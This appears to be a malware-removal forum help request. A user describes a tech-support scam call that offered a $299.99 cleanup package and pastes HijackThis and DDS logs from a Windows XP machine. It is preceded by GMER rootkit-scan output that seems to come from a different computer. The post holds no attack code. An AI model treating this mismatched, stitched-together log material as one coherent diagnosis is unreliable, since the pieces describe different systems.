.text C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe[8340] C:\windows\syswow64\KERNEL32.dll!GetBinaryTypeW + 112 000000007728a2fd 1 byte [62]
.text C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe[8340] C:\windows\syswow64\KERNEL32.dll!K32GetModuleFileNameExW 000000007728b21b 5 bytes JMP 000000016eb815c8
.text C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe[8340] C:\windows\syswow64\KERNEL32.dll!K32EnumProcessModulesEx 0000000077308e24 7 bytes JMP 000000016eb81357
.text C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe[8340] C:\windows\syswow64\KERNEL32.dll!K32GetModuleInformation 0000000077308ea9 5 bytes JMP 000000016eb816f4
.text C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe[8340] C:\windows\syswow64\KERNEL32.dll!K32GetMappedFileNameW 00000000773091ff 5 bytes JMP 000000016eb8101e
.text C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe[8340] C:\windows\syswow64\KERNELBASE.dll!GetModuleHandleW 0000000075b91d1b 5 bytes JMP 000000016eb811e5
.text C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe[8340] C:\windows\syswow64\KERNELBASE.dll!GetModuleHandleExW 0000000075b91dc9 5 bytes JMP 000000016eb81019
.text C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe[8340] C:\windows\syswow64\KERNELBASE.dll!LoadLibraryExW 0000000075b92aa4 5 bytes JMP 000000016eb81573
.text C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe[8340] C:\windows\syswow64\KERNELBASE.dll!FreeLibrary 0000000075b92d0a 5 bytes JMP 000000016eb8128f
.text C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe[8340] C:\windows\syswow64\USER32.dll!CreateWindowExW 00000000761c8a29 5 bytes JMP 000000016eb81046
.text C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe[8340] C:\windows\syswow64\USER32.dll!EnumDisplayDevicesA 00000000761d4572 5 bytes JMP 000000016eb810c8
.text C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe[8340] C:\windows\syswow64\USER32.dll!EnumDisplayDevicesW 00000000761ee567 5 bytes JMP 000000016eb81433
.text C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe[8340] C:\windows\syswow64\USER32.dll!DisplayConfigGetDeviceInfo 0000000076227a5c 5 bytes JMP 000000016eb815f0
.text C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe[8340] C:\windows\syswow64\GDI32.dll!D3DKMTGetDisplayModeList 0000000075d9e96b 5 bytes JMP 000000016eb815e1
.text C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe[8340] C:\windows\syswow64\GDI32.dll!D3DKMTQueryAdapterInfo 0000000075d9eba5 5 bytes JMP 000000016eb811a9
.text C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe[8340] C:\windows\syswow64\ole32.dll!CoSetProxyBlanket 0000000075fd5ea5 5 bytes JMP 000000016eb81618
.text C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe[8340] C:\windows\syswow64\ole32.dll!CoCreateInstance 0000000076009d0b 5 bytes JMP 000000016eb8123f
.text C:\windows\system32\wuauclt.exe[8528] C:\windows\system32\KERNELBASE.dll!FreeLibrary 000007fefe202db0 5 bytes JMP 000007fffe1d0180
.text C:\windows\system32\wuauclt.exe[8528] C:\windows\system32\KERNELBASE.dll!GetModuleHandleW 000007fefe2037d0 7 bytes JMP 000007fffe1d00d8
.text C:\windows\system32\wuauclt.exe[8528] C:\windows\system32\KERNELBASE.dll!LoadLibraryExW 000007fefe208ef0 6 bytes JMP 000007fffe1d0148
.text C:\windows\system32\wuauclt.exe[8528] C:\windows\system32\KERNELBASE.dll!GetModuleHandleExW 000007fefe21af60 5 bytes JMP 000007fffe1d0110
.text C:\windows\system32\wuauclt.exe[8528] C:\windows\system32\ole32.dll!CoCreateInstance 000007feff8e7490 11 bytes JMP 000007fffe1d0228
.text C:\windows\system32\wuauclt.exe[8528] C:\windows\system32\ole32.dll!CoSetProxyBlanket 000007feff8fbf00 7 bytes JMP 000007fffe1d0260
.text C:\windows\system32\wuauclt.exe[8528] C:\windows\system32\GDI32.dll!D3DKMTQueryAdapterInfo 000007fefe4489e0 8 bytes JMP 000007fffe1d01f0
.text C:\windows\system32\wuauclt.exe[8528] C:\windows\system32\GDI32.dll!D3DKMTGetDisplayModeList 000007fefe44be40 8 bytes JMP 000007fffe1d01b8
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\kernel32.dll!RegQueryValueExW 0000000077261f0e 7 bytes JMP 000000016eb816b3
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\kernel32.dll!RegSetValueExW 0000000077265bad 7 bytes JMP 000000016eb811cc
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\kernel32.dll!RegSetValueExA 0000000077271409 7 bytes JMP 000000016eb812a8
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\kernel32.dll!RegDeleteValueW 000000007727ea45 7 bytes JMP 000000016eb81262
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\kernel32.dll!GetBinaryTypeW + 112 000000007728a2fd 1 byte [62]
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\kernel32.dll!K32GetModuleFileNameExW 000000007728b21b 5 bytes JMP 000000016eb815c8
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\kernel32.dll!K32EnumProcessModulesEx 0000000077308e24 7 bytes JMP 000000016eb81357
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\kernel32.dll!K32GetModuleInformation 0000000077308ea9 5 bytes JMP 000000016eb816f4
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\kernel32.dll!K32GetMappedFileNameW 00000000773091ff 5 bytes JMP 000000016eb8101e
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\KERNELBASE.dll!GetModuleHandleW 0000000075b91d1b 5 bytes JMP 000000016eb811e5
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\KERNELBASE.dll!GetModuleHandleExW 0000000075b91dc9 5 bytes JMP 000000016eb81019
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\KERNELBASE.dll!LoadLibraryExW 0000000075b92aa4 5 bytes JMP 000000016eb81573
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\KERNELBASE.dll!FreeLibrary 0000000075b92d0a 5 bytes JMP 000000016eb8128f
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\GDI32.dll!D3DKMTGetDisplayModeList 0000000075d9e96b 5 bytes JMP 000000016eb815e1
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\GDI32.dll!D3DKMTQueryAdapterInfo 0000000075d9eba5 5 bytes JMP 000000016eb811a9
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\USER32.dll!CreateWindowExW 00000000761c8a29 5 bytes JMP 000000016eb81046
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\USER32.dll!EnumDisplayDevicesA 00000000761d4572 5 bytes JMP 000000016eb810c8
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\USER32.dll!EnumDisplayDevicesW 00000000761ee567 5 bytes JMP 000000016eb81433
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\USER32.dll!DisplayConfigGetDeviceInfo 0000000076227a5c 5 bytes JMP 000000016eb815f0
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\ole32.dll!CoSetProxyBlanket 0000000075fd5ea5 5 bytes JMP 000000016eb81618
.text C:\Users\Darin Conway\Desktop\zykpr7ru.exe[8660] C:\windows\syswow64\ole32.dll!CoCreateInstance 0000000076009d0b 5 bytes JMP 000000016eb8123f
---- Processes - GMER 2.1 ----

Library C:\ProgramData\Razer\Synapse\Devices\RazerConfigNative.dll (*** suspicious ***) @ C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe [6712] (Razer Configurator/Razer Inc.)(2013-08-28 10:22:22) 0000000055890000
Library Ì÷fà]H (*** suspicious ***) @ C:\Users\Darin Conway\Desktop\dds.scr [8240] 0000000010000000
Library Ì÷fà]H (*** suspicious ***) @ C:\Users\Darin Conway\Desktop\dds.scr [8240] 0000000000480000
Library Ì÷fà]H (*** suspicious ***) @ C:\Users\Darin Conway\Desktop\dds.scr [8240] 0000000002fa0000

---- Registry - GMER 2.1 ----

Reg HKLM\SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{53909159-70EE-44EB-B73D-281AD170A331}\Connection@Name isatap.{F37099EB-A12B-4A45-935E-BA33BE38797D}
Reg HKLM\SYSTEM\CurrentControlSet\Control\Network\{4d36e975-e325-11ce-bfc1-08002be10318}\{2B07FAA1-8217-4E30-B5EC-FD4501E773BB}\Linkage@Bind \Device\{53909159-70EE-44EB-B73D-281AD170A331}?\Device\{4CA3677F-F882-499B-B89F-204FEC1428B3}?\Device\{6606E52C-2B64-497E-AB93-940620B61304}?\Device\{4F34948B-BD65-4AE3-9C8E-5B1077DA1B88}?\Device\{95C2E741-9CD5-4F34-B6BA-89A864802C97}?\Device\{A89B145B-4528-42F9-92B0-9A15BE39F0FD}?\Device\{108AC479-5065-49BB-AE8C-DF42D97CB44A}?
Reg HKLM\SYSTEM\CurrentControlSet\Control\Network\{4d36e975-e325-11ce-bfc1-08002be10318}\{2B07FAA1-8217-4E30-B5EC-FD4501E773BB}\Linkage@Route "{53909159-70EE-44EB-B73D-281AD170A331}"?"{4CA3677F-F882-499B-B89F-204FEC1428B3}"?"{6606E52C-2B64-497E-AB93-940620B61304}"?"{4F34948B-BD65-4AE3-9C8E-5B1077DA1B88}"?"{95C2E741-9CD5-4F34-B6BA-89A864802C97}"?"{A89B145B-4528-42F9-92B0-9A15BE39F0FD}"?"{108AC479-5065-49BB-AE8C-DF42D97CB44A}"?
Reg HKLM\SYSTEM\CurrentControlSet\Control\Network\{4d36e975-e325-11ce-bfc1-08002be10318}\{2B07FAA1-8217-4E30-B5EC-FD4501E773BB}\Linkage@Export \Device\TCPIP6TUNNEL_{53909159-70EE-44EB-B73D-281AD170A331}?\Device\TCPIP6TUNNEL_{4CA3677F-F882-499B-B89F-204FEC1428B3}?\Device\TCPIP6TUNNEL_{6606E52C-2B64-497E-AB93-940620B61304}?\Device\TCPIP6TUNNEL_{4F34948B-BD65-4AE3-9C8E-5B1077DA1B88}?\Device\TCPIP6TUNNEL_{95C2E741-9CD5-4F34-B6BA-89A864802C97}?\Device\TCPIP6TUNNEL_{A89B145B-4528-42F9-92B0-9A15BE39F0FD}?\Device\TCPIP6TUNNEL_{108AC479-5065-49BB-AE8C-DF42D97CB44A}?
Reg HKLM\SYSTEM\CurrentControlSet\services\BTHPORT\Parameters\Keys\0cd292295e4f
Reg HKLM\SYSTEM\CurrentControlSet\services\BTHPORT\Parameters\Keys\977061000000
Reg HKLM\SYSTEM\CurrentControlSet\services\iphlpsvc\Parameters\Isatap\{53909159-70EE-44EB-B73D-281AD170A331}@InterfaceName isatap.{F37099EB-A12B-4A45-935E-BA33BE38797D}
Reg HKLM\SYSTEM\CurrentControlSet\services\iphlpsvc\Parameters\Isatap\{53909159-70EE-44EB-B73D-281AD170A331}@ReusableType 0
Reg HKLM\SYSTEM\CurrentControlSet\services\iphlpsvc\Parameters\Isatap\{95C2E741-9CD5-4F34-B6BA-89A864802C97}@InterfaceName isatap.{36316754-925E-4EA1-9A7A-BC28B66E7323}
Reg HKLM\SYSTEM\CurrentControlSet\services\iphlpsvc\Parameters\Isatap\{95C2E741-9CD5-4F34-B6BA-89A864802C97}@ReusableType 0
Reg HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Epoch2@Epoch 21930
Reg HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{D9B99B6 4-5150-47F8-9801-8C26B9359248}@LeaseObtainedTime 1399678811
Reg HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{D9B99B6 4-5150-47F8-9801-8C26B9359248}@T1 1399679261
Reg HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{D9B99B6 4-5150-47F8-9801-8C26B9359248}@T2 1399679598
Reg HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{D9B99B6 4-5150-47F8-9801-8C26B9359248}@LeaseTerminatesTime 1399679711
Reg HKLM\SYSTEM\ControlSet002\services\BTHPORT\Parameters\Keys\0cd292295e4f (not active ControlSet)
Reg HKLM\SYSTEM\ControlSet002\services\BTHPORT\Parameters\Keys\977061000000 (not active ControlSet)

---- EOF - GMER 2.1 ----




I appreciate your time and help! :)

I’ve been running a program called System Mechanic. I got a call from them today where they said I was getting attempts from Hackers trying to invade my computer. In the Event Viewer it showed 77 Warnings and Errors (see pic). For all I know it could’ve been THEIR program that installed them in the first place! But I’m not that paranoid…normally. And I wouldn’t have been now if it wasn’t for the fact that after they took over my computer online they then tried to sell me a package to clean up my computer that consisted of the following:

Remove all infection & errors & warnings
Remove red infection
Remove all Hackers zone & trojan virus

Reprogram Network
Ip Address security
Home Network security with Internet security lifetime
Anti Hacking Tools lifetime
Block the getway service for Hackers
Reinstal all protection & programing service
Replace all currupted fiels with working files
Replace system mechanic with latest version 12.7 pro with licence key (free Updation)
====================================================
Software warranty with Unlimited tech support(24x7) hrs

2 hrs 2 Tech

3 years - 1comp=$199.99
Lifetime- 5 comp + all device= $299.99

303-351-5186 phone ext 221


I told them I’d let them know.
So now I don’t know what to believe! I’m sure there is something slowing up my computer but I know it’s not worth the $300.00 they want to charge me. They went on to show me all of the things in the System Configuration box that are STOPPED and claimed they would have to purchase a Microsoft license and have to reload and reconfigure my Network , etc…

So I’m here looking for the truth and how to resolve the issue.
Below is my information:

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 6:15:34 PM, on 5/9/2014
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\iolo\Common\Lib\ioloServiceManager.exe
C:\Program Files\Norton Security Suite\Engine\21.2.0.38\N360.exe
C:\Program Files\Norton Security Suite\Engine\21.2.0.38\N360.exe
C:\Program Files\iolo\System Mechanic\ioloGovernor.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\Program Files\Paltalk Messenger\paltalk.exe
C:\Program Files\RarmaRadio\RarmaRadio.exe
C:\Documents and Settings\Owner\Desktop\meterH.exe
C:\WINDOWS\system32\SNDVOL32.EXE
C:\Program Files\Internet Explorer\iexplore.exe
C:\Documents and Settings\Owner\Desktop\HijackThis.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R3 - URLSearchHook: (no name) - {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - (no file)
O2 - BHO: Norton Identity Protection - {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files\Norton Security Suite\Engine\21.2.0.38\coIEPlg.dll
O2 - BHO: Norton Vulnerability Protection - {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\Program Files\Norton Security Suite\Engine\21.2.0.38\IPS\IPSBHO.DLL
O2 - BHO: RoboForm - {724d43a9-0d85-11d4-9908-00400523e39a} - C:\Program Files\Siber Systems\AI RoboForm\roboform.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll
O3 - Toolbar: &RoboForm - {724d43a0-0d85-11d4-9908-00400523e39a} - C:\Program Files\Siber Systems\AI RoboForm\roboform.dll
O3 - Toolbar: Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files\Norton Security Suite\Engine\21.2.0.38\coIEPlg.dll
O3 - Toolbar: (no name) - {434D472D-5637-006A-76A7-7A786E7484D7} - (no file)
O4 - HKLM\..\Run: [ioloGovernor] C:\Program Files\iolo\System Mechanic\ioloGovernor.exe
O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O8 - Extra context menu item: Customize Menu - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComCustomizeIEMenu.html
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Fill Forms - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComFillForms.html
O8 - Extra context menu item: RoboForm Toolbar - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComShowToolbar.html
O8 - Extra context menu item: Save Forms - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComSavePass.html
O8 - Extra context menu item: Search Image on TinEye - file://C:\Documents and Settings\Owner\My Documents\TinEye IE Plugin\TinEye.js
O9 - Extra button: Fill Forms - {320AF880-6646-11D3-ABEE-C5DBF3571F46} - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComFillForms.html
O9 - Extra 'Tools' menuitem: Fill Forms - {320AF880-6646-11D3-ABEE-C5DBF3571F46} - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComFillForms.html
O9 - Extra button: Save - {320AF880-6646-11D3-ABEE-C5DBF3571F49} - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComSavePass.html
O9 - Extra 'Tools' menuitem: Save Forms - {320AF880-6646-11D3-ABEE-C5DBF3571F49} - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComSavePass.html
O9 - Extra button: RoboForm - {724d43aa-0d85-11d4-9908-00400523e39a} - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComShowToolbar.html
O9 - Extra 'Tools' menuitem: RoboForm Toolbar - {724d43aa-0d85-11d4-9908-00400523e39a} - file://C:\Program Files\Siber Systems\AI RoboForm\RoboFormComShowToolbar.html
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O16 - DPF: {2357B3CF-7F8D-4451-8D81-FD6097610AEE} - http://activex.camfrogweb.com/advanc...instmodule.exe
O16 - DPF: {CF84DAC5-A4F5-419E-A0BA-C01FFD71112F} - http://content.systemrequirementslab...l_4.5.13.0.cab
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: iolo System Service (ioloSystemService) - iolo technologies, LLC - C:\Program Files\iolo\Common\Lib\ioloServiceManager.exe
O23 - Service: MBAMService - Malwarebytes Corporation - C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: Norton Security Suite (N360) - Symantec Corporation - C:\Program Files\Norton Security Suite\Engine\21.2.0.38\N360.exe

--
End of file - 6214 bytes



DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 10.55.2
Run by Owner at 18:21:34 on 2014-05-09
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.1534.772 [GMT -5:00]
.
AV: Norton Security Suite *Enabled/Updated* {E10A9785-9598-4754-B552-92431C1C35F8}
FW: Norton Security Suite *Enabled*
.
============== Running Processes ================
.
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\iolo\Common\Lib\ioloServiceManager.exe
C:\Program Files\Norton Security Suite\Engine\21.2.0.38\N360.exe
C:\Program Files\Norton Security Suite\Engine\21.2.0.38\N360.exe
C:\Program Files\iolo\System Mechanic\ioloGovernor.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\HP1006MC.EXE
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\Program Files\Paltalk Messenger\paltalk.exe
C:\Program Files\RarmaRadio\RarmaRadio.exe
C:\Documents and Settings\Owner\Desktop\meterH.exe
C:\WINDOWS\system32\SNDVOL32.EXE
C:\Program Files\Windows Media Player\wmplayer.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k WudfServiceGroup
C:\WINDOWS\system32\svchost.exe -k NetworkService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\System32\svchost.exe -k HTTPFilter
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://my.yahoo.com/
uURLSearchHooks: {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - <orphaned>
BHO: Norton Identity Protection: {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - c:\program files\norton security suite\engine\21.2.0.38\coieplg.dll
BHO: Norton Vulnerability Protection: {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - c:\program files\norton security suite\engine\21.2.0.38\ips\ipsbho.dll
BHO: RoboForm: {724d43a9-0d85-11d4-9908-00400523e39a} - c:\program files\siber systems\ai roboform\roboform.dll
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - c:\program files\java\jre7\bin\ssv.dll
TB: &RoboForm: {724D43A0-0D85-11D4-9908-00400523E39A} - c:\program files\siber systems\ai roboform\roboform.dll
TB: &RoboForm: {724d43a0-0d85-11d4-9908-00400523e39a} - c:\program files\siber systems\ai roboform\roboform.dll
TB: Norton Toolbar: {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - c:\program files\norton security suite\engine\21.2.0.38\coieplg.dll
uRun: [ctfmon.exe] c:\windows\system32\ctfmon.exe
mRun: [ioloGovernor] c:\program files\iolo\system mechanic\ioloGovernor.exe
mRun: [IgfxTray] c:\windows\system32\igfxtray.exe
mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
mPolicies-Windows\System: Allow-LogonScript-NetbiosDisabled = dword:1
mPolicies-Explorer: NoDriveTypeAutoRun = dword:145
IE: Customize Menu - c:\program files\siber systems\ai roboform\RoboFormComCustomizeIEMenu.html
IE: E&xport to Microsoft Excel - c:\progra~1\micros~2\office11\EXCEL.EXE/3000
IE: Fill Forms - c:\program files\siber systems\ai roboform\RoboFormComFillForms.html
IE: RoboForm Toolbar - c:\program files\siber systems\ai roboform\RoboFormComShowToolbar.html
IE: Save Forms - c:\program files\siber systems\ai roboform\RoboFormComSavePass.html
IE: Search Image on TinEye - c:\documents and settings\owner\my documents\tineye ie plugin\TinEye.js
IE: {320AF880-6646-11D3-ABEE-C5DBF3571F46} - c:\program files\siber systems\ai roboform\RoboFormComFillForms.html
IE: {320AF880-6646-11D3-ABEE-C5DBF3571F49} - c:\program files\siber systems\ai roboform\RoboFormComSavePass.html
IE: {724d43aa-0d85-11d4-9908-00400523e39a} - c:\program files\siber systems\ai roboform\RoboFormComShowToolbar.html
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
.
INFO: HKCU has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
.
INFO: HKLM has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
DPF: {17492023-C23A-453E-A040-C7C580BBF700} - hxxp://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab
DPF: {2357B3CF-7F8D-4451-8D81-FD6097610AEE} - hxxp://activex.camfrogweb.com/advanced/2.0.2.3/cfweb_activex.camfrogweb.com-advanced-2.0.2.3_instmodule.exe
DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} - hxxp://windowsupdate.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1362001188500
DPF: {CF84DAC5-A4F5-419E-A0BA-C01FFD71112F} - hxxp://content.systemrequirementslab.com.s3.amazonaws.com/global/bin/srldetect_intel_4.5.13.0.cab
TCP: NameServer = 192.168.10.1
TCP: Interfaces\{7D688A97-0443-4D60-874A-3B706DCB0ACC} : DHCPNameServer = 192.168.10.1
TCP: Interfaces\{CC5F00C4-DE79-4137-845C-70F378A5F7CA} : DHCPNameServer = 192.168.2.1
Notify: igfxcui - igfxsrvc.dll
SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll
Hosts: 127.0.0.1 www.spywareinfo.com
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\documents and settings\owner\application data\mozilla\firefox\profiles\i4463fux.default\
FF - prefs.js: browser.search.selectedEngine - Bing
FF - prefs.js: browser.startup.homepage - hxxp://my.yahoo.com/
FF - plugin: c:\program files\adobe\reader 11.0\reader\air\nppdf32.dll
FF - plugin: c:\program files\java\jre7\bin\dtplugin\npdeployJava1.dll
FF - plugin: c:\program files\java\jre7\bin\plugin2\npjp2.dll
FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_12_0_0_77.dll
.
============= SERVICES / DRIVERS ===============
.
R0 SymDS;Symantec Data Store;c:\windows\system32\drivers\n360\1502000.026\symds.sys [2014-4-3 367704]
R0 SymEFA;Symantec Extended File Attributes;c:\windows\system32\drivers\n360\1502000.026\symefa.sys [2014-4-3 936152]
R1 BHDrvx86;BHDrvx86;c:\program files\norton security suite\nortondata\21.1.0.18\definitions\bashdefs\20140409.001\BHDrvx86.sys [2014-4-19 1098968]
R1 ccSet_N360;N360 Settings Manager;c:\windows\system32\drivers\n360\1502000.026\ccsetx86.sys [2014-4-3 127064]
R1 SymIRON;Symantec Iron Driver;c:\windows\system32\drivers\n360\1502000.026\ironx86.sys [2014-4-3 206936]
R2 ioloSystemService;iolo System Service;c:\program files\iolo\common\lib\ioloServiceManager.exe [2014-4-24 4492776]
R2 N360;Norton Security Suite;c:\program files\norton security suite\engine\21.2.0.38\n360.exe [2014-4-3 265040]
R2 PDFsFilter;PDFsFilter;c:\windows\system32\drivers\PDFsFilter.sys [2014-4-24 68464]
R3 EraserUtilRebootDrv;EraserUtilRebootDrv;c:\program files\common files\symantec shared\eengine\EraserUtilRebootDrv.sys [2013-12-18 108120]
R3 IDSxpx86;IDSxpx86;c:\program files\norton security suite\nortondata\21.1.0.18\definitions\ipsdefs\20140508.001\IDSXpx86.sys [2014-5-9 383120]
R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2013-8-12 22856]
R3 NAVENG;NAVENG;c:\program files\norton security suite\nortondata\21.1.0.18\definitions\virusdefs\20140509.004\NAVENG.SYS [2014-5-9 93272]
R3 NAVEX15;NAVEX15;c:\program files\norton security suite\nortondata\21.1.0.18\definitions\virusdefs\20140509.004\NAVEX15.SYS [2014-5-9 1612376]
